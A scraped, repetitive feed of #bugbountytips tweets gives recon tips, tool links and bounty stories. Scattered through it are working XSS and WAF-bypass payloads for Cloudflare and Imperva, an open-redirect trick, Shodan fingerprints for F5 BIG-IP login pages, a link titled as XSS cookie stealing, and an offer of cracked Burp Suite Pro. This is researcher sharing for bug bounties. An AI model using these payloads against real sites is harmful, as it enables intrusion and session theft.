I just published Bypassing OTP via reset password
#bugbountytips #bugbounty
https://t.co/N4gSywXvx4
Friendly reminder that zdns > massdns #bugbountytips
Just bored.
So posting this poll.
What was the most exciting bug you've ever found?
Doesn't necessarily need to be your highest paid bug!
Vote and comment down below
#bugbounty #hacking #bugbountytips #bugbountytip
#infosec Hashtags for reach XD
Bug bounty tip: don’t tweet useless bug bounty tips
#bugbountytips
RT @Jhaddix: Sunday Night #BugBounty #bugbountytips

1 Stored XSS
1 Reflected XSS
1 Admin Panel exposed to interwebz
1 potentially sensitive video exposed to the pub internet

Remember to check/search security-related GitHub issues for the frameworks you run a
RT @ehsayaan: I was very inconsistent about what should I do when hunting on a progr
#bugbounty #bugbountytips https://t.co/4d4ip9qSor
RT @B3nac: Nice find! 🎉 Here's a adb one liner to list activities. adb shell dumpsys packa
https://t.co/RQqpWyHLPp
RT @GochaOqradze: Post based Cors misconfiguration PoC
#bugbountytips #bugbountytip https://t.co/0NQPWfxCLH
RT @ArmanSameer95: A Tool to find broken links: Broken Link Checker!
Check this out guys
https://t.co/M0458IjFZ2
#bugbounty #bugbountytips #Hacking https://t.co/yq3HM3fTmw
RT @scspcommunity: #Bug #Bounty #Tips part 4!

#bugbounty #bugbountytips #ethicalhacking #hacking #pentesting #PenTest #infosec

https://t.co/bUpmo6t6Oe
RT @sriramoffcl: Access revoked only on Front-end still vulnerable on Back-end !
#BugBounty #bugbountytips #hackerone #bugcrowd
️RT @trbughunters: ️Top 25 Local File Inclusion (LFI) Parameters 🛡️

#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking #

RT @OAcybersecurity: Hackerone CTF XSS Challenge $250 (BugPoc) 2020 https://t.co/K
RT @ExploitedSystem: Hey Guys Just Uploaded a Video Checking it out would mean alot

#cybersecurity #infosec #bugbounty #bugbountytips #ethicalhacking #hacking #passw

RT @AniruddhaKl: Network Protocols

#infosec #cybersecurity #cybersec #networksecurity #vapt #bugbounty #bugbountytip

RT @AndyInfoSec_: Network Protocols

#infosec #cybersecurity #cybersec #networksecurity #vapt #bugbounty #bugbountytip

Subdomain Takeover 101 ..@EdOverflow Great Blog
learn a lot
https://t.co/xAHIs10wiQ
----
#togatherwelearn #bugbountytips
Network Protocols

#infosec #cybersecurity #cybersec #networksecurity #vapt #bugbounty #bugbountytip

Network Protocols

#infosec #cybersecurity #cybersec #networksecurity #vapt #bugbounty #bugbountytip

#bugbounty #bugbountytips People sometimes ask how you can "eyeball" a site and kn
https://t.co/PDGu7IHYk3
Recently, I have started using the tool "Arjun" for finding the hidden parameters, howev
RT @Akshanshjaiswl: I just published my writeup on Pre-Access to Victim’s Account via
#bugbountytips #bugbountytip #bugbounty #infosec
Hey Guys Just Uploaded a Video Checking it out would mean alot ! Make Sure to Like an

#cybersecurity #infosec #bugbounty #bugbountytips #ethicalhacking #hacking #passw

RT @plenumlab: Very useful tool by @TomNomNom
Feed it urls it will give you a list of interesting ones, at least in theory, https://t.co/1GW
#BugBounty #bugbountytips
Bypass I learned from @rene_kroka this week:
https://t.co/SzIavQtyOR

onpointerrawupdate= " A='',B=!A+A,C=!B+A,D=A+{},E=B[A++],F=B[G=A],H=++G+A,

👆 = alert(1)

#bugbounty #bugbountytips
Best way to search Project Sonar database for subdomain enumeration.

https://t.co/t5WYUzjvvp

Credits to @CalumBoal
#bugbountytips
#pentest #pentesting #hacking #bugbounty #bugbountytips #web #KaliLinux #linux #
Access revoked only on Front-end still vulnerable on Back-end !
#BugBounty #bugbountytips #hackerone #bugcrowd
6 steps and 2 tools to attack JSON Web Token
https://t.co/uRHKNn6pSW
https://t.co/PBDNgsjLnh

#hacktory_tools #bugbounty #cybersecurity #bugbountytip #bugbountytips #cybersec

Cache Poisoning on Wordpress --> Stored XSS --> POST "/wp-admin/user-new.ph

Triaged with "High" instead of "Critical" . Don't know what is wrong !

#bugbountytips Tweet has tip as well :D

@andirrahmani1 #bugbountytips
Changed @0xbharath's VirusTotal sub-domains enumeration script. Crawl all the result p

@appseccouk #bugbountytip #bugbounty #recon #bugbountytips

https://t.co/6JXlkUtURd
RT @Digitalsanjog: Content Marketing: India is a country of storytellers. We have storyte
for more just gaze at
https://t.co/fj7v5RvW2z
#storytelling #contentmarketing #contentstrategy #storyteller #bugbountytips #Conte
Content Marketing: India is a country of storytellers. We have storytellers in every field
for more just gaze at
https://t.co/fj7v5RvW2z
#storytelling #contentmarketing #contentstrategy #storyteller #bugbountytips #Conte
RT @Jhaddix: Wednesday Night #BugBounty #bugbountytips

Recording my #hacktivitycon2020 talk tonight, so no hacking. A couple of small updates

RT @ssh0x00r: interested in bug bounty ? (free tip by @NahamSec )

LINK IN BIO

#infosec #cybersecurity #hacking #bugbountytips

RT @ssh0x00r: i've been scratching my head for long time, thanks @stok @hakluke for

check this out: https://t.co/5ntEFHHPCz

#hacking #bugbountytips #infosec #motivation

RT @frankmosigisi: What is the best impact if you find
React app api key and want to report it
#bugbounty #bugbountytips
RT @netspooky: #Cloudflare #WAFbypass

Just got a $1000 payout 💵📥

<uu src=@'@' onbigclick=import('//0a" "0a0a?0a/')>mou%09se<|/

#BugBountyTips #bugbountytip #redteam #waf #obfuscation #security #linux #togeth

RT @Nep_1337_1998: To Find #f5 instances

Shodan:
+-+-+-+-+-
F5-Login-Page
WWW-Authenticate: Basic realm=BIG-IP
BigIP
BIG-IP
http.favicon.hash:-335242539
http.title:"BIG-IP®- Redirect"

https://t.co/0n61Dor29y

@dnkolegov #bugbountytips #f5 #recon #infosec @vis_hacker https://t.co/QNCKbIBv4

RT @1m4xx0: https://t.co/dzjyB9hTDN
Made a simple directory search tool using python which will send notification on your Te

Feel free to use the code and modify according to your need!
#BugBounty #bugbountytips #bugbounty #python #redteam
RT @Unknownuser1806: Find #CVEs

https://t.co/wOOxzbydBN
https://t.co/lKvQHEpTHl
https://t.co/n1teetr8Fm
https://t.co/1VBangzPPl
https://t.co/X2wQL3dlax
https://t.co/0Wo6cTaaNK
https://t.co/EE1lHBzVfg
https://t.co/VTeYjVvtYi
https://t.co/ELwT1ILHWG
https://t.co/XBkHfF1rSP

#bugbounty,#bugbountytips

Recon Tip for :

-Subdomain enumeration
-Finding endpoints
-Finding parameters By @0xElkot

#bugbountytips #BugBounty #bugbountytip https://t.co/CAemcyCGQn

Second medium blog-post:

Stealing your Paytm information using XSS by: @VirenPawar_

https://t.co/fPs3KiXFL0

#bugbounty #infosec #bugbountytips #xss #medium #paytm #SharingIsCaring

What is the best impact if you find
React app api key and want to report it
#bugbounty #bugbountytips
i've been scratching my head for long time, thanks @stok @hakluke for a motivation

check this out: https://t.co/5ntEFHHPCz

#hacking #bugbountytips #infosec #motivation

#hacking #BugsBunny #bugbountytips #javabug #CVE
Javabug学习小项目
https://t.co/PISv5OdYWN
RT @pdiscoveryio: Major #update to the public bounty and disclosure programs, we've a

- https://t.co/aLRBoIam6V

#security #recon #bugbounty #bugbountytips #infosec

“How I Hacked My College’s Online Exam Portal During COVID-19 Quarantine Period” by

#bugbountytips
#xploitprotocol
https://t.co/oFpw0k2Yvy
SQLTruncScanner - Scan endpoints for possible SQL Truncation vulnerabilities.

#bugbountytips
#xploitprotocol
https://t.co/tfUPQNlIhO
BurpSuite-Xkeys: A Burp Suite Extension to extract interesting strings (key, secret, toke
#bugbountytips

https://t.co/N4e7DgDRsy
interested in bug bounty ? (free tip by @NahamSec )

LINK IN BIO

#infosec #cybersecurity #hacking #bugbountytips

So happy with my HackerOne stats over these past 90 Days! #BugBounty #HackerOne #
#bugbountytips

Does anyone has list of root domains of all public programs in the BB platforms ?
Could you please share ?
If not I am planning to make one and share

thanks
FORD Session token URL lead to Reflected XSS #bugbountytips #bugbounty #hackerone
RT @disclose_io: New VDPs and #bugbounty programs at https://t.co/JtaCJYPiNA!

Total: 926
Full safe harbor: 126 (13.6%)
Partial safe harbor: 207 (22.4%)

w/ Bounties: 399 (43.1%)

w/ HOF: 593 (64.0%)
w/ Swag: 45 (4.9%)

Missing yours? Submit a PR!

#bugbountytips #infosec #cybersecurity

The biggest takeaways from most talks are things I am already biased towards. Unlearn
Imperva Waf XSS ByPass :

Payload : <sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9

Codepen : https://t.co/ls37WLuqEK

#BugBounty #BugBountyTip #BugBountyTips #WhiteHats https://t.co/fB2kjCvZVn

RT @scspcommunity: #bugbounty tips part 2

#hacking #ethicalhacking #bugbounty #bugbountytip #securitytesting #webapp #pent

https://t.co/4pcPahsC8Z
RT @scspcommunity: Bug Bounty Tips part 3

#bugbountytip #bugbountytips #bugbounty #bughunting #bughunter #hackerone #bug

RT @scspcommunity: Take your #bugbounty game to a higher level with the Bug Bounty

#Pentesting #infosec #cybersecurity #informationsecurity #hacking #ethicalhacker #e

RT @BugBountyWeekly: You can use @hackvertor to generate random IP to bypass rate-
RT @scspcommunity: A little treasure for all you #BugBounty Hunters! 😉

#infosec #informationsecurity #infosecurity #CyberSecurity #cyber #cybersec #PenTes

HOURS & HOURS OF FREE CYBER SECURITY TRAINING??? (im loosing it) https://t

August is going to be.. crazy!

feat: @Hacker0x01 @defcon @redteamvillage @AppSec_Village @Bugcrowd @secarmyof
#bugbounty #bugbountytips #appsec #infosec https://t.co/PAbmt6Zms6
Wednesday Night #BugBounty #bugbountytips

Recording my #hacktivitycon2020 talk tonight, so no hacking. A couple of small updates

RT @william_leeser: #bugbountytips #BugBounty If you are starting now and don't have
This is a short survey by @AndyInfoSec_ to learn about bug bounty hunting preferences

https://t.co/Pzi6NQyjun

#infosec #bugbounty #bugbountytips #vapt #cybersec #Hacker #togetherwehitharder

RT @AniruddhaKl: This is a short survey by @AndyInfoSec_ to learn about bug bounty hu

https://t.co/e17U8dPAoy

#infosec #bugbounty #bugbountytips #vapt #cybersec #Hacker #togetherwehitharder

This is a short survey by @AndyInfoSec_ to learn about bug bounty hunting preferences

https://t.co/e17U8dPAoy

#infosec #bugbounty #bugbountytips #vapt #cybersec #Hacker #togetherwehitharder

this is baller #bugbountytips https://t.co/V02NNJ4DFR
Technique, Tool and Lecture (TTL) #20
-
-
🤓 Follow @gainsec
-
https://t.co/rvDexPiL6X
-
#Hacking #ethicalhacker #bugbountytips #infosec #pentesting #pentester #cybersecu
RT @FindomainApp: If you're using our services, look for "CODE: 502" and "ERROR: The
RT @mehmetcangunes: I was included in the Hall of Fame by GOOGLE😀

https://t.co/jeo7qLld2R

#bugbounty #infosec #ethicalhacking #CyberSecurity #halloffame #bugbountytips http

RT @_Y000_: Xss payload

-->'"<h1><img src="/" =_=" title="onerror='javascript=pr\u006fmpt`_Y000

#payload #xss #bugbountytips https://t.co/nMGEmCjlkj

RT @TheJulfikar: extract endpoints from JavaScript files by @renniepak

cat main.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | s

#bugbountytips #bugbountytip #bugbounty https://t.co/pzEK1vXePR

RT @UrielYochpaz: I can upload any file to a jetty server
But when i try uploading jsp files i get an Error "Could not initialize org.apache..."
Any help?
#bugbountytips
RT @hsakarp_ilajna: #IDOR_TIPS

1.Extracted url's of application from wayback machine using wayback script.

2.Made a script with custom wordlist to fuzz on obtained url.
3. One of them leaked sensitive content based on #application's workflow.

#bugbountytips #bugbounty #infosec #cybersecurity

RT @bountyhunter_fr: Password reset function token leak

After sending the password reset request, sometimes the reset token is leaked in the HT

#bugbountytips
RT @EvMd15: #bugbountytips #wordpresssecurity #wordpress

List backup file wp-config https://t.co/lbegI0dJuy

#bugbountytips #wordpresssecurity #wordpress

List backup file wp-config https://t.co/lbegI0dJuy

RT @chiraggupta8769: #FREE 2ಠ2ಠ ♥
Burp Suite Professional Edition v2020.7 x64 Full Activated + All Addons – Discount 100%

By @3XS0

Link : https://t.co/d10yTBiWxk

#BurpSuite #bugbounty #bugbountytips https://t.co/2u5MUDv4iD

RT @Jhaddix: Tuesday Night #BugBounty #bugbountytips

Spend about 3 hours hunting. Didn't find anything.

RT @aish_kendle: Last week, collaborated with @thakare_prateek and hijacked 24+ sub

Some tips :
-Enumerate subdomains from multiple tools
-Do check the 404 pages
-Check the cname record
-Automate everything

#bugbounty #bugbountytips #recon https://t.co/Jw2B72QjrW

RT @pdnuclei: # Nuclei templates v2.0.6 updates.

- More CVEs.
- More takeovers.
- More workflows.
https://t.co/HHUvgjcHAq

Shout out to @dwisiswant0, @EdOverflow, adiffpirate, ankh2054,@nahoragg, @Marmela

#infosec #hackwithautomation #bugbountytips #pentest #cybersecurity https://t.co/D

RT @JaggarHenry: Automating thousands of subdomain takeovers for fun and for profit.

https://t.co/nJa0i4kRyt https://t.co/Cwrv1MNCkw
Initial report: Open Redirect+XSS -> Triaged -> Resolved
Check it again and can still "Open Redirect" -> Report and Bounty

The payload: javascript:@youtube.com

Use the ":" character to bypass the filter and "@" to redirect to that domain
#BugBountyTips #BugBounty #ItTakesACrowd https://t.co/PrTMuJqKNA
RT @r0bre: Today I'm releasing JSMon, an automated JS file change monitor for #bugbo
https://t.co/EZFBW3QUuz
Big thanks to @EdOverflow @Yassineaboukir for inspiring this & @TomNomNom @s
#bugbountytip #bugbountytips #hacking #infosec #recon https://t.co/IjTKonoByv
RT @ceos3c: Let's talk about UFW and VPS. Ethical Hacking Diaries #10 now up (video w

https://t.co/tt5gIpElm1

#linux #cybersecurityawareness #cybersecurity #itsecurity #bugbounty #openbugbou

RT @Tismayil1: Yes I awarded 2200$ in Private Program.

USED Repos
Port Scan : https://t.co/H2z9ieqauA
DirSearch : https://t.co/1L6MutcaEc
Backup Scanner : https://t.co/76A96QYjRD

#BugBounty #bugbountytip #bugbountytips #WhiteHats https://t.co/VWF3Txn6K5

RT @t1nd19d: If your looking for flexibility when doing offensif forensic or data manip' ,

#bugbountytips #BugBounty
If your looking for flexibility when doing offensif forensic or data manip' , master regex

#bugbountytips #BugBounty
Password reset function token leak

After sending the password reset request, sometimes the reset token is leaked in the HT

#bugbountytips
Subdomain recon tools step by step :

1) amass - scan for subdomains

2) altdns - compute wordlist with result for new subdomains
3) dnsprobe - check if found subdomain is valid
4) nmap - scan subdomain ports

#bugbountytips
CORS vulnerability

https://t.co/yJL5qKXC8L not working? Try with company.tld

Sometimes the check is only on the domain name without the top level domain that you
#bugbountytips
Bash code for manuel subdomain takeover testing:

cat subdomains.txt | xargs -n1 dig @1.1.1.1 | grep -A10 NXDO | grep CNAME

#BugBounty #bugbountytips #bugbountytip @hacktivist1337

Major #update to the public bounty and disclosure programs, we've added almost 200 n

- https://t.co/aLRBoIam6V

#security #recon #bugbounty #bugbountytips #infosec

RT @xerosecurity: Stay up-to-date with the latest emerging security threats, vulnerabili

#hackers #hacking #bugbounty #bugbountytips #pentesting #pentest #redteam #OSIN

RT @TrainingBug: XSS COOKIE STEALING
https://t.co/6r9hYbiBFs
#bugbounty #bugbountytips #Hackers #Hacked #ceh #Ethicalhacking #oscp #CTF #xs
RT @TrainingBug: XSS on non existent parameters
https://t.co/npFTgGQYS2
#bugbounty #bugbountytips #Hackers #Hacked #ceh #Ethicalhacking #oscp #CTF #xs
XSS on non existent parameters
https://t.co/npFTgGQYS2
#bugbounty #bugbountytips #Hackers #Hacked #ceh #Ethicalhacking #oscp #CTF #xs
XSS COOKIE STEALING
https://t.co/6r9hYbiBFs
#bugbounty #bugbountytips #Hackers #Hacked #ceh #Ethicalhacking #oscp #CTF #xs
one line bash script to get every domain on specific IP
curl -s -k -X $'GET' -H $'Host: https://t.co/L2UFEqV7P7' --url 'https://t.co/nxZ1TBmTS
#bugbountytips #bugbountytip @rapiddns
RT @Shivam31200: A short p1 story inspired by
@ADITYASHENDE17 @Shubham_4500
#bugbounty #bugbountytips https://t.co/SpUQsl5HKM
📡via @securityweekly -pod w/ research recognition 2 @steventseeley 4 @SharePoint R

https://t.co/XBSk8E3WST
#BugBounty #bugbountytips #bugbountytip #Cyber #Security #CyberSecurity #Podcas
RT @ome_mishra: Just scored a bounty of €1000 @intigriti, check my profile: https://t.c
#HackWithIntigriti
#bugbountytips

Always Try Understand the application you will get something cool.... 🤘🏻
Very useful tool by @TomNomNom
Feed it urls it will give you a list of interesting ones, at least in theory, https://t.co/1GW
#BugBounty #bugbountytips
RT @CyberRitesh: #Day11 #Challenge365

1) Critical File Found

2) Source Code Disclosure
3) #tryhackme Challenges
4) WriteUps reading on #bugbounty

#bugbountytips #CyberSecurity
#Day11 #Challenge365

1) Critical File Found

2) Source Code Disclosure
3) #tryhackme Challenges
4) WriteUps reading on #bugbounty

#bugbountytips #CyberSecurity
RT @InsiderPhD: New video!
This week we're answering a question: How do the pros find those CVEs before anyone e
#BugBounty #bugbountytips

https://t.co/MwjjfvHbLC https://t.co/BbM6qe75nx